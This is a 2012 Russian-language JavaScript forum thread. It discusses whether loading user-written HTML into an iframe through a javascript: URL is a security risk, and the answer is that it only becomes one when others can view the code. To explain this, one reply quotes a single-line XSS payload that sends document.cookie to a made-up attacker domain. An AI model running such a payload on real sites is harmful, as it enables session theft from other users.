Javascript-форум (https://javascript.ru/forum/)
-   Общие вопросы Javascript (https://javascript.ru/forum/misc/)
-   -   Безопасность и динамические фреймы (https://javascript.ru/forum/misc/25094-bezopasnost-i-dinamicheskie-frejjmy.html)

qwertyuiop10 25.01.2012 11:25
Безопасность и динамические фреймы
 
Есть легкий «полигон». Смысл в том, что написаный html в textarea загружается в ифрейм:

<html>
<head>
</head>
<body>
<div class="a" onClick="cvf();">&gt;&gt;&gt;Посмотреть,&nbsp;что&nbsp;получилось&gt;&gt;&gt;</div>
<form action="" name="cod">
<textarea>
</textarea>
</form>
<iframe src="javascript:parent.document.cod.elements[0].value" id="mf"></iframe>
<script type="text/javascript">
function cvf(){
document.getElementById('mf').contentWindow.location.reload();
}
</script>
</body>
</html>


Вопрос: это же опасно? Если я этот код вставлю на свой сайт, человек сможет делать запросы к серверу избегая Same origin policy. Если это опасно, то как можно защититься, если не опасно, то почему никто так не делает?

Kolyaj 25.01.2012 11:30
Он сможет вставить любой код у себя в браузере. А у себя в браузере он и так через консоль что угодно на вашем сайте сделать может.

Nekromancer 25.01.2012 11:48
Цитата:
Сообщение от qwertyuiop10
если не опасно, то почему никто так не делает?
Может потому, что это просто ужасно?

melky 25.01.2012 12:21
извините, не увидел никакой опасности. что в этом фрейме такого страшного?

Kolyaj 25.01.2012 12:42
Цитата:
Сообщение от qwertyuiop10
то почему никто так не делает?
А зачем это делать?

qwertyuiop10 25.01.2012 13:19
Nekromancer,
Например здесь запускаемый код, можно так сдеделать, не будет обращения к серверу, фрейм будет появляться мгновенно. Почему именно, это плохо?

qwertyuiop10 25.01.2012 13:22
Kolyaj,
ну да, точно. не подумал...

Nekromancer 25.01.2012 13:22
qwertyuiop10,
Я не понимаю ваш язык.

Kolyaj 25.01.2012 13:29
Цитата:
Сообщение от qwertyuiop10
Например здесь запускаемый код
Здесь написанный кем-то код запускается у других пользователей. В вашем примере такого нет.

qwertyuiop10 25.01.2012 13:36
Nekromancer,
На этом сайте есть возможность вставлять запускаемый код. Почему бы её не реализовать способом, указанным мной? Небыло бы лишнего обращения к серверу и код был бы проще. Ещё - xiper.net, в справочнике css есть полигон внизу страници, описывающей какое-либо свойство. Почему его не реализовать таким образом? Я думаю, что если так не делают, значит есть какие-то существенные недостатки. Какие?

B@rmaley.e><e 25.01.2012 14:47
qwertyuiop10, потому что Ваш подход небезопасен.

qwertyuiop10 25.01.2012 17:15
B@rmaley.e><e,

Ну так я же спрашиваю: почему небезопасен? Поточнее пожалуйста.

Aetae 25.01.2012 17:20
Вам же сказали - если человек может воспользоваться этим только для себя - всё нормально.
Но если он может показать написанное другим, то нет.

Сам себе человек и так может что угодно запустить на вашей странице.
Если же он может дать другим посмотреть написанное, то нет ничег проще чем написать например:
document.write('<img src="http://l33thaxor.net/?'+encodeURIComponent(document.cookie)+'">')

qwertyuiop10 25.01.2012 20:01
Ну а на счет мини-подигона на xiper.net? Там юзер меняет только в своём браузере. И вообще, не видел ни одного полигона, реализованного без обращения к серверу, хотя везде пользователь меняет страницы в своём браузере.

Aetae 25.01.2012 21:49
Хз как оно там: может статьи пишутся юзерами,мож задел на будущее, who cares.


Часовой пояс GMT +3, время: 10:31.